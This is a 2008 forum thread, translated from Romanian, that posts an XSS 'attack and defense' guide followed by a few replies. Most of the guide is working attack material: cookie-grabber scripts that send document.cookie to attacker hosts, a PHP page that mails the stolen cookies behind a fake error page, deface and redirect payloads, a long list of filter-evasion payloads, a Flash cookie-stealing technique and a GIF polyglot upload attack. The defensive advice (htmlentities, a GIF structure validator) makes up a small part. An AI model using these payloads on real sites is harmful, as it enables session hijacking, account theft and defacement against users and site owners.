CODEX Posted July 12, 2008

Cross Site Scripting - Attack and Defense guide
By Xylitol. Translated into Romanian by CODEX for www.rstcenter.com

INDEX:
1. What is XSS?
2. Where and why does XSS appear?
3. How to make a cookie grabber
4. How to defend against XSS
5. Deface methods
6. Filters
7. Flash attack
8. XSS upload
9. Phishing XSS

.:: Chapter 1 - What is XSS? ::.

First of all we need to know that XSS is a vulnerability that appears on a server or site and allows a script to be inserted into an HTML page on a server. A found XSS is displayed in a textbox.

.:: Chapter 2 - Where and why does XSS appear? ::.

XSS appears because of poor filtering of the code, or in many cases no filtering at all. I'll take the following code, which is used in most tutorials to illustrate XSS.

CODE:

    <html>
    <head><title>Xss Vulnerabilitate</title></head>
    <!-- html -->
    <!-- best if you use html -->
    <form action="" method="post">
    your code:<br><br>
    <input type="text" name="xss"><br><br>
    <input type="submit" value="XSSvul"><br>
    </form>
    <!-- the script follows -->
    <?php
    if (isset($_POST['xss'])) {
        // if xss exists then we carry out:
        echo $_POST['xss'];   // XSS appears here because the code isn't filtered
    }
    ?>
    </html>

The code is so weak that it can't filter that the code contains forbidden symbols such as <>, /, ', " etc.

.:: Chapter 3 - Make a cookie grabber ::.

Insert this code into a vulnerable page:

    <script>window.open("http://www.Hax0r.com/cookie.php?cookies="+document.cookie);</script>

(www.Hax0r.com = your site)

Open notepad and make a document: cookie.php, then copy/paste this code:

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    <title>Error</title>
    <style type="text/css">
    <!--
    body,td,th {color: #FFFFFF;}
    body {background-color: #000000;}
    -->
    </style>
    </head>
    <? mail('email@example.com', 'Cookie stealed ! - thx xyli ', $cookies); ?>
    <body>
    <h2>Error - Access denied for <? echo $_SERVER["REMOTE_ADDR"]; ?></h2>
    </body>
    </html>

.:: Chapter 4 - Securing XSS ::.

FIX it: to get rid of XSS vulnerabilities we use htmlentities. On line 16 replace:

    <body><span class="alerte">Search result :</span><?php echo $_POST['Vulnerability']; ?></body>

with:

    <body><span class="alerte">Search result :</span>
    <?php if (isset($_POST['Vulnerability'])) { echo htmlentities($_POST['Vulnerability']); } ?>
    </body>

We use the htmlspecialchars() function in PHP; other functions: htmlentities(), quotes, strip_tags()...

.:: Chapter 5 - Deface methods ::.

Here the deface can be done simply. This doesn't mean you have access to the database or that you delete the site; you just insert something into the HTML code, such as:

Deface with an image:

or a flash video:

    <EMBED SRC="http://hax0r.com/Haxored.swf">

redirect:

    <script>window.open( "http://www.hax0r.com/Haxored.html" )</script>

also see:

    <meta http-equiv="refresh" content="0; url=http://hax0r.com/Haxored.html" />

.:: Chapter 6 - Filters and unfiltered scripts ::.

    <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;URL=http://;URL=javascript:alert('XSS');\">
    <META HTTP-EQUIV=\"refresh\"CONTENT=\"0;url=javascript:alert('XSS');\">
    '">><marquee><h1>XSS</h1></marquee>
    '">><script>alert('XSS')</script>
    '>><marquee><h1>XSS</h1></marquee>
    "><script alert(String.fromCharCode(88,83,83))</script>
    <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
    <divstyle="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCode(88,83,83));'))">
    window.alert("Xyli !");
    "/></a></><img src=1.gif onerror=alert(1)>
    mouse over
    <body onLoad="alert('XSS');"
    <body onunload="javascript:alert('XSS');">
    click me
    <script language="JavaScript">alert('XSS')</script>
    '); alert('XSS
    <font style='color:expression(alert(document.cookie))'>
    <IMG DYNSRC=\"javascript:alert('XSS')\">
    <IMG LOWSRC=\"javascript:alert('XSS')\">
    </textarea><script>alert(/xss/)</script>
    </title><script>alert(/xss/)</script>
    <script src=http://yoursite.com/your_files.js></script>
    "><script>alert(0)</script>
    <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
    <IMG SRC=\"jav ascript:alert('XSS');\">
    <IMG SRC=\"jav ascript:alert('XSS');\">
    <IMG SRC=\"jav ascript:alert('XSS');\">
    <marquee><script>alert('XSS')</script></marquee>
    <? echo('<scr)';echo('ipt>alert(\"XSS\")</script>'); ?>
    <IMG SRC=\"jav ascript:alert('XSS');\">
    <IMG SRC=\"jav ascript:alert('XSS');\">
    <marquee><script>alert('XSS')</script></marquee>
    <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
    <img src=foo.png onerror=alert(/xssed/) />
    <script>alert(String.fromCharCode(88,83,83))</script>
    <scr<script>ipt>alert('XSS');</scr</script>ipt>
    <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
    <script src="http://www.evilsite.org/cookiegrabber.php"></script>
    <script>alert('XSS');</script>
    <script>alert(1);</script>

These are only a part; you'll find more on google.

.:: Chapter 7 - Flash attack ::.

Flash is used for complex animations, simulations, creation of games etc. What's interesting for us is the getURL() action. This function allows us to redirect the end user to another page. Its syntax is built as follows:

    getURL(url:String, [window:String, [method:String]])

example:

    getURL("http://victime.com/login.php?logout=true","_self");

url: indicates the URL of the site
window: specifies within which frame the request must take place (_self, _blank...)
method: request method, GET or POST (by default GET)

Here the handling of the ActionScript and the JavaScript to post an alert:

    getURL("javascript:alert('XSS')");

In 2002 the danger of this facility was shown; one could for example post the cookie of visitors in this manner:

    getURL("javascript:alert(document.cookie)")

In December 2005 a new alternative appeared, consisting in benefiting from a non-permanent XSS fault and the possibility of putting a flash file in one's signature to give a permanent XSS; moreover the author of this alternative used this technique in order to infect MySpace with an xss worm derived from Samy: Samy Reloaded.

Cookie stealer in flash? No, but there is a technique to do it. Example, in a flash file:

    GetURL("http://www.victime.com/page.php?var=<script src='http://www.hax0r.com/Haxored.js'></script>","_self");

and in Haxored.js:

    document.location="http://hax0r.com/cookiestealer.php?cookie="+document.cookie;

To secure it, simple solution: do not allow flash files in your web app.

.:: Chapter 8 - XSS upload ::.

Make Haxored.gif in Paint, for example. After you've opened Haxored.GIF in notepad, delete everything and insert this:

    GIF89a<script>alert("XSS")</script>

Save and close it. Upload Haxored.gif to a free image hosting and the XSS appears...
* In Mozilla the error won't appear; to see the error use IE.

Why do we add GIF89a? Well, some uploads, like this one, check that the 'GIF89a' code is contained in the image, as in any .GIF. The vulnerability of this upload results from checking the 'GIF89a' code for confirmation but not the possible malicious code contained in this image.

    GIF89a<script src="http://hax0r.com/cookiegrabber.php"></script>

To know the code for another image format, it is enough to open a jpg or other image with a text editor; for example a png file: ‰PNG
PNG = ‰PNG
GIF = GIF89a
JPG =
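A structural check of the kind chapter 8 says the upload is missing, as an added example (Python, not code from the guide or from rstcenter): it walks the GIF block layout, so the signature-only payload and a real GIF with a script appended after the trailer both fail, while a real 1x1 GIF passes. Sample inputs are constructed inline.

```python
# An upload check that only looks for the 'GIF89a' signature accepts
# GIF89a<script>alert("XSS")</script>; this validator walks the real GIF structure.
GIF_SIGNATURES = (b"GIF87a", b"GIF89a")

def _skip_sub_blocks(data: bytes, pos: int) -> int:
    """Skip a chain of length-prefixed sub-blocks; return offset after the 0x00 end."""
    while True:
        size = data[pos]  # IndexError on a truncated file is caught by the caller
        pos += 1
        if size == 0:
            return pos
        pos += size

def is_structurally_valid_gif(data: bytes) -> bool:
    """True only if data is exactly one GIF: header, screen descriptor, at least
    one image block and the 0x3B trailer, with nothing appended after it."""
    try:
        if data[:6] not in GIF_SIGNATURES:
            return False
        # Logical Screen Descriptor: width(2) height(2) packed(1) bg(1) aspect(1)
        packed = data[10]
        pos = 13
        if packed & 0x80:                      # global colour table present
            pos += 3 * (2 << (packed & 0x07))  # 3 bytes per entry, 2^(N+1) entries
        images = 0
        while True:
            block = data[pos]
            pos += 1
            if block == 0x3B:                  # trailer: reject appended data (polyglots)
                return images > 0 and pos == len(data)
            if block == 0x21:                  # extension: label byte, then sub-blocks
                pos = _skip_sub_blocks(data, pos + 1)
            elif block == 0x2C:                # image descriptor is 9 bytes
                packed = data[pos + 8]
                pos += 9
                if packed & 0x80:              # local colour table
                    pos += 3 * (2 << (packed & 0x07))
                pos = _skip_sub_blocks(data, pos + 1)  # +1 skips LZW min code size
                images += 1
            else:
                return False                   # unknown block type
    except IndexError:
        return False

# Constructed samples: a real 1x1 GIF and the guide's signature-plus-script payload.
TINY_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
            b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b")
FAKE_GIF = b'GIF89a<script>alert("XSS")</script>'
```

Structural validation is only half of it: serve uploads with a fixed image Content-Type and X-Content-Type-Options: nosniff, or from a separate origin, so a browser never interprets them as HTML.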
Hertz Posted July 12, 2008

1) At least if we copy them, let's put them in Romanian.
2) Disable smilies.
3) Do something on trythis0ne, since you don't have even 1 point :D
CODEX (Author) Posted July 12, 2008

Ok, I promise I'll translate it... I'm starting now; I'll do something for try too..
best_bunnn Posted July 12, 2008

Man, translate it too when you have time.. not that I don't understand what it says, but there are some things I really don't understand.....
CODEX (Author) Posted July 12, 2008

Is it better like this? I'll add a bit more to it (the part that's missing, so it's "more complete").
Hertz Posted July 12, 2008

Now that's more like it: you've done points 1 and 2. Waiting for 3 :D
CODEX (Author) Posted July 12, 2008

Nah, since you insisted, 15 points now; I have to get past the other ones too, the game is interesting.